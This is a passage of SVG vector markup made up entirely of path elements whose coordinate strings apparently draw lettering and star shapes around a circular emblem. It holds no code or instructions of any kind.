261.3 C 158.6 255.1 150.8 248.5 142.5 242.5 C 139.6 242.2 138.4 246.1 136.5 247.8 C 135.5 246.8 134.4 245.9 133.3 245.1 Z"/>
                            <path class="st1" d="M 125.1 256.5 C 131.6 259.8 138 263.2 144.5 266.5 C 144.1 267.2 143.2 268.5 142.8 269.2 C 137.7 267.5 132.5 265.2 127.1 266 C 123 266.7 120.9 270.8 119.3 274.1 C 120.5 275.1 121.8 276.1 123.1 276.8 C 133.9 283.1 144.7 289.2 155.5 295.5 C 157.1 296.4 158.7 297.5 160.6 297.1 C 162.3 295.2 163.5 292.9 164.8 290.6 C 166 291.2 167.2 291.9 168.5 292.6 C 164.1 300.3 159.6 308 155.2 315.6 C 154 314.9 152.8 314.3 151.5 313.6 C 153.1 311.2 154.4 308.6 155.5 305.9 C 144.7 299.1 133.4 293.1 122.5 286.6 C 120.1 285.3 117.8 283.6 115.1 282.8 C 111.4 285.3 109.2 291 111.9 295 C 114.5 299.2 118.5 302.3 122.2 305.4 C 121.6 306.3 121 307.3 120.5 308.2 C 114.3 304.4 108.2 300.5 102.3 296.4 C 109.8 283.1 117.5 269.8 125.1 256.5 Z"/>
                            <path class="st1" d="M 920.1 301.2 C 921.4 300.7 922.6 300.2 923.9 299.7 C 928.1 309 932.3 318.3 936.5 327.6 C 938.3 331.5 939.1 335.9 937.6 340 C 935.2 347.6 924.9 351.2 918.3 346.7 C 915.6 344.6 913.2 342 911.5 339 C 913.3 344.3 910 349.7 905.6 352.5 C 902.5 355.5 897.5 357.1 896.3 361.6 C 897 362.2 897.8 362.8 898.5 363.5 C 900.7 362.8 902.8 362.2 905 361.4 C 905.5 362.4 906 363.5 906.5 364.5 C 902.6 366.4 898 368 893.7 366.3 C 889.6 364.1 887.3 358.5 889.3 354.3 C 893.7 346.9 905.4 346.7 907.9 337.9 C 908.2 334 906 330.4 904.5 327 C 897.9 330.3 890.6 332.6 884.4 336.7 C 885.4 339.2 886.5 341.7 887.7 344.1 C 886.4 344.7 885.2 345.3 883.9 345.9 C 880.4 338.1 876.7 330.2 873.3 322.3 C 874.5 321.9 875.7 321.5 877 321.2 C 878.4 323.3 879.4 325.5 880.8 327.6 C 890.3 324.2 899.1 319.4 908.4 315.5 C 913.2 313.2 918.1 311.3 922.7 308.7 C 922.2 306.1 921.2 303.6 920.1 301.2 M 908.3 325.1 C 910.8 331.4 913.5 339.3 921 341.1 C 925.4 340 930.2 338.2 932.2 333.9 C 933.3 330.1 931.5 326.4 930 323 C 929 321 928.4 318.7 926.6 317.3 C 920.3 319.3 914.5 322.6 908.3 325.1 Z"/>
                            <path class="st1" d="M 82.1 339 C 83.2 339.4 84.4 339.8 85.5 340.2 C 85.1 342.4 84 344.7 85.2 346.8 C 86.1 348.6 88.1 349.4 89.7 350.3 C 104.1 355.8 119 359.9 133.4 365.4 C 132.7 367 132.2 368.9 130.1 369.1 C 112.8 374.6 95.5 380 78.2 385.5 C 86.9 388.6 95.8 391.3 104.4 394.4 C 107.5 395.4 110.7 396.9 114.1 396.4 C 117.2 395.7 118.2 392.4 119.5 389.9 C 120.6 390.3 121.7 390.7 122.9 391.1 C 120.4 397.9 118.4 404.8 116 411.6 C 114.8 411.2 113.7 410.8 112.5 410.5 C 112.6 407.9 113.9 404.5 111.5 402.6 C 108.9 400.4 105.5 399.5 102.4 398.4 C 92.1 395.1 81.9 391.5 71.8 387.9 C 69.2 389.6 68.1 392.5 67 395.2 C 65.8 394.6 64.6 394 63.4 393.4 C 65.1 388.7 66.7 384 68.2 379.3 C 84.3 374.1 100.5 369.3 116.5 364 C 106.6 360.9 96.9 357 86.9 354.2 C 82.5 352.5 79.6 357.1 78.5 360.7 C 77.3 360.3 76.1 360 74.9 359.6 C 77.4 352.9 79.4 345.8 82.1 339 Z"/>
                            <path class="st1" d="M 925.5 364.6 C 934.3 362.9 944.4 364.5 951.1 370.8 C 957.7 377.1 959.7 387.5 956.5 396 C 958.2 396.5 959.8 396.9 961.5 397.4 C 961.7 398.5 961.9 399.5 962.2 400.6 C 955 402.9 947.9 405.3 940.7 407.8 C 940.3 406.7 940 405.5 939.7 404.4 C 945.3 401.6 951 397.9 953.5 391.9 C 955.2 387.7 954.2 382.9 951.8 379.2 C 949.4 375.1 944.6 373.4 940.1 373.1 C 932.9 372.7 925.8 375 919.1 377.4 C 913.9 379.5 908.5 382.5 906 387.8 C 903.7 393.8 905.9 401 910.7 405.1 C 915.2 408.8 921.2 409.2 926.8 409.1 C 927 410.4 927.2 411.7 927.5 413.1 C 922.3 413 916.7 413.8 912 411.1 C 900.7 405.4 897.4 389.2 904 378.9 C 908.2 370.9 916.9 366.4 925.5 364.6 Z"/>
                            <path class="st1" d="M 61.1 405 C 62.4 405.2 63.8 405.5 65.1 405.7 C 64.8 407.4 64.4 409.1 64.1 410.8 C 64.9 412.6 66 414.4 68.1 414.7 C 77.1 416.7 86.1 418.1 95.2 419.7 C 100.9 420.8 107 423 110.1 428.1 C 113.3 433.5 112.6 440.1 111.4 446 C 110.2 451.1 108.1 456.6 103.5 459.6 C 99.3 462.6 93.8 462.4 88.9 461.6 C 79 459.7 69 458.1 59.1 456.3 C 54.8 455.3 55.7 461.4 54.5 464 C 53.2 463.8 51.9 463.6 50.5 463.4 C 52.2 455.2 53.4 446.9 55 438.7 C 56.3 438.8 57.5 438.9 58.8 439.1 C 58.6 441.7 58.3 444.3 58.2 447 C 67.6 449.4 77.3 450.4 86.8 452.5 C 91.9 453.4 98.2 455 102.6 451.1 C 106.5 447.2 107.9 441.4 107.8 436 C 107.8 431.2 104.6 426.6 100 425.2 C 95.1 423.7 89.9 423.2 84.8 422.2 C 77.8 421.1 71 419.1 63.9 419.2 C 62.3 421.5 61.6 424.3 61.1 427.1 C 59.8 426.7 58.5 426.5 57.3 426 C 58.5 418.9 59.8 411.9 61.1 405 Z"/>
                            <path class="st1" d="M 960.4 413.9 C 961.7 413.7 963 413.4 964.4 413.2 C 967 428 969.9 442.8 972.2 457.7 C 965.7 459 959.2 460.5 952.8 462.1 C 952.6 460.8 952.5 459.6 952.3 458.3 C 957.1 456.2 963.2 454.2 965.1 448.8 C 965.9 442.9 965.3 436.5 962.7 431.2 C 956 430.9 949.5 433.4 942.9 434 C 943.6 437.4 944.6 441.2 947.7 443.2 C 950.1 444.2 952.8 444.1 955.4 444.2 C 955.6 445.4 955.8 446.6 956 447.8 C 947.8 449 939.8 450.7 931.6 452.1 C 931.5 450.9 931.3 449.7 931.2 448.5 C 934.7 447.5 938.6 445.7 939.6 441.8 C 939.7 439.6 940.2 437 939 435 C 932.2 435.7 925.6 437.2 918.9 438.5 C 916.4 438.7 917.1 441.9 917.3 443.7 C 918.4 448.8 918.9 454.5 922.1 458.8 C 926.2 463.3 932.8 462.9 938.3 463 C 938.5 463.9 939 465.5 939.2 466.4 C 932.1 467.3 925 468.2 917.9 469 C 915.2 453.7 912.5 438.5 909.7 423.2 C 910.9 422.8 912.2 422.5 913.4 422.1 C 914.3 424.6 914.1 427.7 916.1 429.6 C 928.3 428.2 940.3 425.2 952.5 423.4 C 955.4 423 958.3 422.3 961.1 421.3 C 961.1 418.8 960.8 416.4 960.4 413.9 Z"/>
                            <path class="st1" d="M 269.8 511.1 C 270.4 507.6 270.5 504.1 271.1 500.6 C 271.6 503.9 271.7 507.3 271.7 510.7 C 272.8 512.1 273.9 513.5 274.9 515 C 277.4 515.4 279.8 515.9 282.3 516.4 C 279.9 516.8 277.5 517.2 275 517.6 C 274 519.1 272.9 520.6 272 522.2 C 271.4 525.8 271.5 529.4 271.1 533 C 270.2 529.3 270.4 525.4 269.8 521.7 C 268.7 520.4 267.8 519 266.8 517.6 C 264.4 517.2 262.1 516.8 259.8 516.2 C 262.1 515.7 264.5 515.4 266.8 515 C 267.7 513.6 268.7 512.3 269.8 511.1 Z"/>
                            <path class="st1" d="M 826.5 507.2 C 827.3 511.6 827.2 516.2 827.5 520.6 C 829.1 522.1 830.2 523.9 831.2 525.9 C 834.4 526.4 837.6 526.9 840.9 527.4 C 837.8 528.3 834.5 528.7 831.3 529.4 C 830.2 531.3 829 533.1 827.5 534.8 C 827.3 539.4 826.9 544 826.7 548.5 C 825.4 544 825.7 539.3 825 534.7 C 823.4 533 822.3 531 820.9 529.2 C 817.8 528.4 814.6 528.2 811.5 527.5 C 814.7 526.8 818 526.4 821.3 525.9 C 822.2 523.9 823.4 522.1 825.1 520.7 C 825.7 516.3 825.5 511.7 826.5 507.2 Z"/>
                            <path class="st1" d="M 103.8 595.1 C 104.9 594.7 106 594.3 107.1 594 C 109.3 602.3 111.9 610.5 114.1 618.8 C 115 624.3 115.4 630.5 112.3 635.3 C 108 642.2 99.9 645.6 92.2 646.9 C 85 648.4 76.7 647.1 71.5 641.6 C 67.5 637.7 66.6 632 65 627 C 63.2 620.5 61.3 614 59.5 607.5 C 60.4 607.3 62.2 606.8 63.1 606.6 C 63.7 608.6 64.3 610.6 65 612.6 C 71 612.3 76.7 609.9 82.5 608.4 C 89.9 606 97.5 604.5 104.7 601.8 C 104.6 599.5 104.2 597.3 103.8 595.1 M 82.9 616.5 C 77.8 618 72.6 619.2 67.7 621.1 C 68.7 626.2 69.7 631.8 73.1 635.9 C 77.1 640.2 83.6 639.7 88.8 638.5 C 95.9 636.8 104 635 108.6 628.7 C 112.5 622.8 109.5 615.6 107.1 609.8 C 99 611.6 91.1 614.4 82.9 616.5 Z"/>
                            <path class="st1" d="M 904 640 C 907.5 627 911.2 614.2 914.9 601.3 C 920.6 602.5 926.3 604 931.9 605.2 C 931.7 606.3 931.6 607.4 931.4 608.5 C 926.6 608 920.8 607.3 917.1 611.2 C 914.2 615.4 912.8 620.6 911.9 625.6 C 913.4 627.1 915.6 627.6 917.6 628.2 C 921.4 629.3 925.2 630.5 929.1 631.2 C 930.1 628.8 930.2 626 929.6 623.4 C 928.2 620.8 925.4 619.7 923 618.5 C 923.4 617.5 923.7 616.6 924.1 615.6 C 931.3 617.1 938.1 619.7 945.3 621.4 C 945 622.4 944.6 623.4 944.3 624.3 C 941.6 624.4 938.7 623.8 936.3 625.3 C 934.1 627 933.3 629.8 932.2 632.2 C 938.6 634.1 944.9 636.1 951.4 637.5 C 953.7 634 954.6 629.9 955.4 625.8 C 955.8 623.1 956.2 619.9 954.6 617.5 C 951.8 614.1 947.8 612 944.1 610 C 944.3 609.3 944.5 607.8 944.7 607.1 C 950.7 609.2 956.9 610.9 962.9 613.4 C 959 626.7 955.3 640 951.5 653.4 C 950.6 653.2 948.8 652.6 948 652.4 C 948.5 650.3 949.1 648.3 949.6 646.2 C 945.5 643.7 940.6 643.1 936.1 641.6 C 927.3 639.4 918.7 636.2 909.7 634.6 C 908.8 636.7 908.1 638.8 907.5 640.9 C 906.2 640.6 905.1 640.3 904 640 Z"/>
                            <path class="st1" d="M 814 615.5 C 814.8 619.5 814.7 623.6 815.1 627.7 C 816.5 629.1 817.7 630.7 818.6 632.5 C 821.4 632.8 824.2 633.3 827 633.9 C 824.2 634.5 821.3 635 818.5 635.5 C 817.5 637.2 816.4 638.8 815.1 640.3 C 814.7 644.4 814.6 648.5 813.8 652.6 C 813.2 648.8 813.5 644.9 812.9 641 C 811.8 639 810.3 637.3 809.2 635.3 C 806.4 634.8 803.5 634.3 800.7 633.6 C 803.4 633.1 806.2 632.8 808.9 632.2 C 810.2 630.6 811.3 628.9 812.8 627.5 C 813.5 623.5 813.5 619.5 814 615.5 Z"/>
                            <path class="st1" d="M 116.9 643.1 C 118.1 642.6 119.2 642.1 120.3 641.6 C 125.3 654.1 130.1 666.6 135.1 679 C 129.7 681.5 124.3 683.9 118.9 686.4 C 118.5 685.3 118.2 684.3 117.8 683.2 C 121.2 680.8 125.1 678.6 126.9 674.7 C 127.7 668.5 125.1 662.5 122 657.3 C 116.4 659.4 110.9 661.7 105.3 663.7 C 106.7 666.4 108.1 669.6 111 670.7 C 113.3 671.9 115.8 670.6 118.2 670.2 C 118.6 671.2 118.8 672.3 119 673.4 C 112.2 675.9 105.6 678.7 98.9 681.3 C 98.5 680.6 97.9 679.3 97.5 678.7 C 99.5 677.1 101.8 675.7 103.3 673.5 C 104.7 670.7 103.2 667.7 102.4 665 C 96.5 667.5 90.2 669.3 84.5 672.3 C 83.5 674.3 84.9 676.5 85.5 678.4 C 87.3 682.4 88.9 686.8 92.4 689.6 C 96.8 692 101.9 690.3 106.6 690 C 107 690.6 107.7 691.8 108.1 692.4 C 102 694.6 95.8 696.6 89.7 698.6 C 84.6 685.7 79.5 672.7 74.4 659.8 C 75.6 659.4 76.7 659 77.9 658.6 C 78.7 660.7 79.6 662.8 80.8 664.8 C 89.1 661.9 97.2 658.5 105.4 655.3 C 110 653.3 115.1 652.1 119.3 649.3 C 118.5 647.2 117.7 645.2 116.9 643.1 Z"/>
                            <path class="st1" d="M 903.7 650.1 C 902.1 648.1 900.5 645.9 901.8 643.3 C 908.2 645.9 914.9 647.5 921.3 650.1 C 921 651 920.6 652 920.3 653 C 915.7 652.1 910.9 651.5 906.4 653.2 C 900.2 655.4 896.2 663 898.9 669.3 C 901.1 674.2 905.9 677.1 910.5 679.5 C 916.6 682.3 923.3 684.9 930.2 684.5 C 935.5 684.2 939.8 679.9 941 674.9 C 943.7 667.6 938 660.5 932 656.8 C 932.5 655.6 933.1 654.5 933.7 653.4 C 938.6 656.3 943.3 660.4 944.7 666.1 C 946.7 673.3 943.7 681.1 938.7 686.4 C 928.9 695.1 913.4 693.4 903.5 685.7 C 897.3 680.8 892.9 672.9 894.2 664.9 C 894.6 658.8 898.4 653.2 903.7 650.1 Z"/>
                            <path class="st1" d="M 134.2 686.1 C 135.3 685.5 136.5 684.9 137.6 684.3 C 140.1 689.7 142.9 694.9 145.5 700.3 C 148.3 705.5 151.8 710.9 151.9 717 C 151.7 725.2 142.4 731.2 134.8 729.2 C 126.8 726.2 123.2 717.8 119.7 710.6 C 114.5 713.2 109 715.5 104.1 718.8 C 104.9 721.1 106 723.3 107 725.5 C 105.9 726 104.8 726.6 103.7 727.2 C 100.2 720.5 97 713.6 93.4 707 C 94.5 706.4 95.6 705.8 96.6 705.2 C 97.7 707.3 98.9 709.4 100.5 711.3 C 112.6 705.1 124.7 699.1 136.6 692.7 C 136.3 690.4 135.3 688.2 134.2 686.1 M 123 708.7 C 125.6 714.2 128.4 720.9 134.9 722.6 C 139.4 721.2 144.8 719.4 146.5 714.5 C 147.2 709.1 143.7 704.4 141.1 700 C 134.9 702.4 129.1 705.9 123 708.7 Z"/>
                            <path class="st1" d="M 884.4 692.3 C 889.5 688.8 897.4 689.9 900.9 695.1 C 902.2 697 902.5 699.3 902.9 701.5 C 902.5 703.9 902.1 706.3 901.5 708.6 C 903.6 706.9 906.1 705.1 909 705.3 C 914.1 705.7 918.9 707.9 924 708 C 924.6 707.7 925.7 707 926.2 706.7 C 924.6 704.5 922.5 702.9 920.2 701.4 C 920.7 700.5 921.3 699.6 921.8 698.7 C 924.8 700.6 928.6 702.2 929.7 706 C 931.1 710.3 928.1 716.6 923 716.3 C 916.5 716.8 911.2 711.5 904.8 711.8 C 900.2 712.6 898.4 717.5 896.6 721.1 C 902.4 724 908.2 727 914.1 729.8 C 915.6 727.8 916.8 725.5 917.9 723.3 C 919 723.9 920.1 724.5 921.3 725.1 C 917.5 731.6 914.5 738.5 911 745.2 C 909.9 744.7 908.7 744.2 907.6 743.8 C 908.6 741.6 909.5 739.4 910.3 737.2 C 902.2 732.4 893.5 728.7 885.2 724.1 C 881.5 722.5 878 719.9 874 719.1 C 871.9 719.9 871.3 722.7 870.1 724.5 C 869 724 868 723.5 867 722.9 C 870.2 716.5 873.4 710.1 876.7 703.7 C 879 699.8 880.3 694.8 884.4 692.3 M 877.4 711 C 882.5 714.1 888 716.5 893.3 719.2 C 895.8 714.6 899.2 709.7 898.3 704.2 C 896.3 699.5 891 697.3 886.1 697.4 C 881.6 700.7 879.1 705.9 877.4 711 Z"/>
                            <path class="st1" d="M 865.4 732.8 C 881.2 729.2 899.5 742.2 898.9 759 C 899.2 765.1 896.1 770.8 892.1 775.1 C 886.2 781.4 876.5 782.9 868.4 780.5 C 858 776.9 848.5 767.7 848.3 756.2 C 847.5 745.6 855.1 735.1 865.4 732.8 M 864.2 738.2 C 856 739.3 850.2 749.4 854.2 756.9 C 858 763.6 864.6 768.1 871.1 771.9 C 875.5 774.1 880.7 776.6 885.7 774.5 C 890.1 772.8 893.3 768.6 894.4 764.1 C 895.4 756.2 888.8 750.3 883.1 746 C 877.5 742.2 871.2 737.9 864.2 738.2 Z"/>
                            <path class="st1" d="M 121.1 744 C 136.4 741.1 151.7 738 167 734.9 C 167.4 735.9 167.7 736.9 167.9 737.9 C 158.6 751.6 148.4 764.6 139.4 778.5 C 140.1 779.8 140.9 781 141.6 782.3 C 140.6 783 139.5 783.7 138.5 784.4 C 134.6 778.6 131.1 772.7 127.2 766.9 C 128.3 766.3 129.3 765.6 130.4 765 C 131.6 766.7 132.7 768.6 134.3 770 C 138 768.2 139.5 763.8 142.2 760.8 C 139 755.9 135.8 750.9 132.6 745.9 C 128.9 746.6 124.9 746.8 121.9 749.4 C 122.4 751.6 123.2 753.6 124.2 755.7 C 123.2 756.3 122.2 757 121.2 757.7 C 118.1 752.5 114.6 747.5 111.5 742.3 C 112.5 741.7 113.5 741.1 114.5 740.4 C 116.2 742.2 118.3 744.5 121.1 744 M 136.9 744.7 C 139.7 748.7 141.9 753.3 145.2 756.9 C 149.1 751.6 152.7 746.2 156.4 740.8 C 150 742.3 143.4 743.4 136.9 744.7 Z"/>
                            <path class="st1" d="M 177.3 758.4 C 178.3 757.7 179.2 757 180.2 756.3 C 185.2 762.7 190.2 769.2 195.3 775.5 C 197.5 778.3 199.9 781.3 200.5 785.1 C 202 792.3 195.1 800 187.7 798.7 C 183.9 798.5 181 795.8 178.2 793.5 C 178.6 795 179 796.6 179.5 798.1 C 178.1 804.9 171.9 809 169 815 C 169.5 815.5 170.5 816.4 170.9 816.8 C 173 815.9 175 814.8 177 813.6 C 177.6 814.4 178.3 815.2 178.9 816 C 175.7 819 171.4 821.2 167 819.9 C 163.6 818.7 162 815.2 161.2 811.9 C 162.8 807.9 165.6 804.5 168.9 801.8 C 171.5 799.5 174.6 796.7 174.4 792.9 C 173.8 789.4 171.3 786.8 169.3 784.1 C 164.1 788.1 158.7 791.9 154 796.5 C 155.3 798.4 156.8 800.3 158.3 802.2 C 157.4 803.1 156.6 803.9 155.7 804.8 C 150.6 799 146.1 792.8 141.4 786.8 C 142.3 786 143.3 785.2 144.2 784.5 C 145.8 786.1 146.8 788.6 149.1 789.3 C 154.5 786.1 159 781.7 164.1 778 C 169.7 773.3 175.9 769.3 181.1 764.1 C 179.9 762.1 178.6 760.2 177.3 758.4 M 172.2 781.6 C 175.1 785.7 178.1 790.3 182.9 792.3 C 188.2 793.3 193.7 789 194.8 783.8 C 193.8 778.7 190.2 774 186.2 770.8 C 181.3 774.1 177 778.2 172.2 781.6 Z"/>
                            <path class="st1" d="M 811.8 794.9 C 820.5 784.7 829.4 774.6 838.1 764.4 C 842.8 767.9 847.4 771.7 852.1 775.3 C 851.5 776.2 850.8 777.2 850.2 778.1 C 846.7 776.1 843 773.9 838.9 773.6 C 832.7 775 829 780.7 825.2 785.4 C 828.6 790.5 834.1 793.5 838.3 797.9 C 840.4 795.5 842.8 792.6 841.9 789.2 C 841.1 787.2 839.7 785.4 838.4 783.7 C 839 782.9 839.7 782 840.3 781.2 C 846.1 785.7 851.4 790.9 857.2 795.5 C 856.5 796.4 855.8 797.2 855.2 798.1 C 853 796.8 850.6 795.8 848.2 794.9 C 845.5 796.1 843.1 797.8 841 799.9 C 845.9 804.5 850.9 808.9 856.2 813 C 858.2 811.2 860 809.3 861.7 807.3 C 862.6 808.1 863.5 809 864.4 809.9 C 859.5 815.7 854.5 821.3 849.6 827.1 C 848.5 826.4 847.4 825.7 846.4 825 C 847.9 823.3 849.3 821.6 850.7 819.8 C 845.9 813.9 839.4 809.6 833.8 804.4 C 829.2 800.6 825 796.3 820.2 792.8 C 817.8 793.1 816.6 795.7 814.8 797.1 C 813.7 796.3 812.7 795.6 811.8 794.9 Z"/>
                            <path class="st1" d="M 206.6 789.9 C 216.7 799.2 226.5 808.8 236.4 818.2 C 232.3 823.2 228 828 223.8 832.9 C 223.1 832.1 222.3 831.4 221.6 830.7 C 224.5 826.8 227 822.5 228.3 817.7 C 227.1 814.6 225.6 810.7 222.1 809.8 C 216.8 813.9 212.9 819.3 208.1 823.9 C 204.7 827.2 201.7 830.9 198.2 834.2 C 196.6 835.9 194.4 837.5 193.8 839.9 C 194.8 842.1 196.8 843.6 198.6 845.3 C 197.7 846.1 196.9 847 196 847.8 C 190.1 842.5 184.5 837 178.8 831.5 C 179.6 830.6 180.4 829.7 181.3 828.8 C 183.2 830.5 185.1 832.3 187.1 833.8 C 193.9 827.6 199.9 820.7 206.4 814.2 C 209.5 810.4 213.5 807.4 216.1 803.3 C 213.7 800.8 210.8 797.5 206.9 798.3 C 202.2 799.2 198.6 802.6 194.7 805.1 C 194.1 804.6 193.1 803.5 192.5 803 C 197.3 798.8 201.7 794.1 206.6 789.9 Z"/>
                            <path class="st1" d="M 560 814.3 C 565.4 813.5 570.7 812.3 576.1 811.7 C 576.1 814.6 573.2 814.6 571.2 815.5 C 572.5 824.5 574.5 833.4 576 842.4 C 578.2 842.4 581.1 841.3 581.6 844.3 C 576.3 845.2 571 846.4 565.7 847.1 C 565.8 846.4 565.9 845.1 565.9 844.4 C 567.4 844 568.9 843.7 570.4 843.4 C 568.8 834.3 567.4 825.2 565.3 816.3 C 563.8 816.4 562.3 816.6 560.8 816.8 C 560.5 816 560.3 815.1 560 814.3 Z"/>
                            <path class="st1" d="M 454.8 813.2 C 458.7 813.6 462.5 814.1 466.3 814.7 C 468.3 823.1 469.8 831.6 471.8 840 C 475.7 832.3 479.3 824.5 483.2 816.8 C 487.1 817.3 491 817.8 494.8 818.4 C 494.7 819 494.4 820.2 494.2 820.7 C 492.7 820.5 491.2 820.4 489.8 820.4 C 488.4 829.4 487.1 838.6 486.3 847.7 C 487.7 848.3 489.1 848.6 490.6 849.1 C 490.6 849.6 490.7 850.7 490.7 851.3 C 485.7 850.7 480.6 849.9 475.6 849.4 C 475.6 848.7 475.6 847.4 475.6 846.7 C 477.2 846.9 478.8 847.1 480.4 847.4 C 482.2 839.1 482.8 830.6 484 822.2 C 479 830.8 475.4 840.2 470.6 848.9 C 470.1 848.8 469.1 848.6 468.6 848.5 C 466.3 838.8 464.4 829 461.9 819.3 C 460.8 826.5 459.8 833.7 459.1 840.9 C 458.2 843.9 461.6 844.7 463.6 845.6 C 463.7 846.1 463.8 847.2 463.9 847.8 C 459.3 847.3 454.6 846.6 450 846.2 C 450 845.6 450.1 844.3 450.1 843.7 C 451.5 843.7 452.8 843.7 454.2 843.7 C 456.5 841.3 456.5 837.8 457 834.7 C 457.7 828.7 458.7 822.7 459.1 816.6 C 457.4 816 455.6 815.7 453.9 815.5 C 454.2 815.1 454.6 813.9 454.8 813.2 Z"/>
                            <path class="st1" d="M 784.7 820.7 C 789.9 816.4 798.5 817 802.4 822.7 C 806.7 828 804 835.4 799.8 839.8 C 802.8 838.7 806.2 838.2 809 839.8 C 813.5 842.3 817.1 845.9 821.8 848.1 C 822.2 847.6 823.1 846.5 823.5 845.9 C 822.4 843.9 821.2 841.9 819.8 840 C 820.4 839.5 821.7 838.7 822.4 838.2 C 824.7 840.9 827.3 844 826.9 847.9 C 827 852.1 822.8 855.2 819 855.5 C 811.8 854.2 808.4 846.5 801.9 843.8 C 797.3 842.7 794 846.6 790.8 849.2 C 795 854.2 799.1 859.2 803.7 863.8 C 805.7 862.3 807.7 860.8 809.7 859.2 C 810.5 860.1 811.3 861.1 812.1 862 C 806.2 866.9 800.5 872 794.8 877 C 794 876 793.2 875 792.4 874 C 794.2 872.5 795.9 870.9 797.3 869 C 790.9 861.5 784.4 854.1 777.9 846.6 C 775.4 843.7 773 840.6 770 838.1 C 768.2 839.5 766.5 841 764.8 842.3 C 764 841.4 763.1 840.5 762.3 839.7 C 769.8 833.4 777.2 827 784.7 820.7 M 785.4 825.4 C 782.3 827.5 779 829.8 777 833 C 780.3 837.9 784.6 842 788.3 846.5 C 792.3 843.3 797.1 840.1 798.5 834.9 C 799.3 831 796.3 827.8 793.4 825.6 C 791.2 823.5 787.8 823.7 785.4 825.4 Z"/>
                            <path class="st1" d="M 237.4 819.9 C 242 823.6 246.6 827.2 251.2 830.7 C 247.2 843.1 242.7 855.2 238.8 867.6 C 249.6 860.6 260.4 853.6 271.2 846.5 C 275.1 849.4 278.7 852.6 282.7 855.4 C 295 862.2 307.1 869.3 319.3 876.3 C 316.5 881.5 313.8 886.8 311.3 892.1 C 310.3 891.7 309.3 891.2 308.2 890.8 C 309.5 886.5 311.7 881.6 309.6 877.2 C 306.3 872.5 300.9 869.6 295.7 867.5 C 292.2 872.4 289.7 877.8 286.5 882.9 C 289 884 291.5 885.4 294.4 885.1 C 297.2 884.3 299 881.7 300.9 879.7 C 301.6 880.4 302.4 881.1 303 881.9 C 299.9 888.4 295.8 894.4 292.4 900.7 C 291.7 900.3 290.2 899.5 289.5 899.1 C 290.2 896.6 292.2 893.8 290.8 891.2 C 289.6 888.7 287.1 887.3 285 885.6 C 281.9 891.4 278 896.8 275.5 902.9 C 277 905.4 279.9 906.4 282.2 907.9 C 285.8 909.7 289.8 911.9 293.9 910.8 C 298 909.1 300.8 905.3 303.9 902.3 C 304.5 902.7 305.7 903.5 306.4 903.8 C 303 909.2 299.5 914.5 296.1 919.9 C 284 913 272 906 259.9 899.1 C 260.5 898 261.1 896.9 261.7 895.8 C 263.8 896.6 265.8 899 268.1 898.4 C 270.2 895.9 271.6 892.9 273.2 890.1 C 277.8 882.1 282.5 874.2 286.9 866.1 C 287.3 865 288.5 863.7 287.5 862.5 C 284.1 860.1 280.1 858.6 276.7 856.1 C 271.1 862.1 266.5 868.9 261.2 875.2 C 257.9 879.7 253.9 883.8 251.1 888.7 C 252.7 890.1 254.5 891.4 256 892.9 C 255.4 893.9 254.7 894.9 254 895.8 C 247.9 891.4 242.1 886.6 236.1 882 C 236.9 881 237.7 880 238.5 879 C 240.4 880.5 242.4 882 244.6 883.3 C 252.9 873.4 260.7 863.1 268.7 852.9 C 256.6 860.7 244.5 868.7 232.4 876.5 C 231.1 877.9 229.6 876.6 228.2 876.1 C 233.1 861.5 237.8 846.9 242.6 832.3 C 236.3 840.1 230.2 848.1 223.9 856 C 222.5 857.7 221.2 859.5 220.5 861.6 C 219.8 864.7 222.8 866.4 224.5 868.5 C 224 869.1 222.9 870.3 222.3 870.9 C 216.9 866.9 211.7 862.7 206.4 858.5 C 207.1 857.6 207.8 856.7 208.4 855.8 C 210.3 857 212.4 858.2 214.5 859 C 217.2 857.2 219.6 855 221.4 852.4 C 227.6 844.2 234.5 836.4 240.3 827.8 C 239.2 825.6 236.9 824.5 235.1 822.9 C 236 822 236.7 821 237.4 819.9 Z"/>
                            <path class="st1" d="M 742 853.7 C 748.2 849.3 754.4 845 760.5 840.4 C 761.2 841.5 762 842.5 762.7 843.6 C 760.8 844.9 758.9 846.4 757.2 847.9 C 762.4 856.2 768.4 864 774 872 C 776.2 874.9 777.9 878.1 780.3 880.8 C 782.9 881.8 784.9 878.8 787.1 877.7 C 787.7 878.8 788.4 879.9 789 880.9 C 782.9 885.3 776.8 889.6 770.7 893.9 C 769.9 892.9 769.2 891.9 768.4 890.9 C 770.3 889.5 772.2 888.1 773.9 886.5 C 768.8 878.2 762.7 870.5 757.2 862.5 C 754.8 859.2 752.7 855.8 749.9 852.9 C 747.9 854.1 746.1 855.4 744.2 856.7 C 743.5 855.7 742.8 854.7 742 853.7 Z"/>
                            <path class="st1" d="M 720.3 866.4 C 721 866.1 722.4 865.4 723.1 865 C 735.2 874.9 747.6 884.4 759.8 894.1 C 761.8 896 764.3 894.5 766.6 894 C 767.1 895 767.6 896 768.1 897 C 762.1 900.3 756.1 903.8 750.1 907.3 C 749.4 906.2 748.8 905.2 748.1 904.1 C 750.1 902.9 752.1 901.6 753.9 900.1 C 751.1 897.1 747.9 894.6 744.7 892.1 C 739.5 895 734.4 898 729.3 900.9 C 730.1 904.7 729.5 910.1 733.7 912 C 735.3 911.2 736.9 910.4 738.6 909.5 C 739.3 910.6 739.9 911.7 740.6 912.8 C 735.3 915.7 730.2 918.9 724.9 921.7 C 724.3 920.7 723.7 919.7 723.1 918.8 C 725.8 917.1 727.8 914.4 727 911 C 724.8 896.1 722.4 881.3 720.3 866.4 M 725.8 877 C 726.7 883.5 727.5 890.1 728.6 896.6 C 732.9 894.1 737.2 891.7 741.5 889.2 C 736.4 885 731 881.1 725.8 877 Z"/>
                            <path class="st1" d="M 322.7 882.3 C 323.2 881.2 323.8 880.2 324.3 879.1 C 328.4 881 332.5 882.9 336.7 884.8 C 339.7 899.4 342.7 914 345.9 928.5 C 349.3 921.6 352.3 914.4 355.6 907.4 C 356.5 905.3 357.5 903.2 357.6 900.9 C 357.5 898 354.3 896.9 352.4 895.4 C 352.6 894.6 353 893.1 353.2 892.3 C 359.3 894.8 365.2 897.6 371.2 900.3 C 370.8 901.3 370.4 902.3 370 903.4 C 366.7 901.8 362.5 902.2 361 905.9 C 354.9 918.3 349.7 931.2 343.6 943.6 C 342.9 943.2 341.6 942.5 340.9 942.2 C 337.5 925.8 333.9 909.5 330.6 893.1 C 326.6 901.3 323.1 909.8 319.2 918.1 C 318.1 920.2 317.7 922.6 317.6 925 C 319.3 926.5 321 927.9 322.9 929.2 C 322.6 930 322 931.4 321.7 932.2 C 315.8 929.6 310.1 926.8 304.1 924.3 C 304.5 923.2 304.9 922.1 305.3 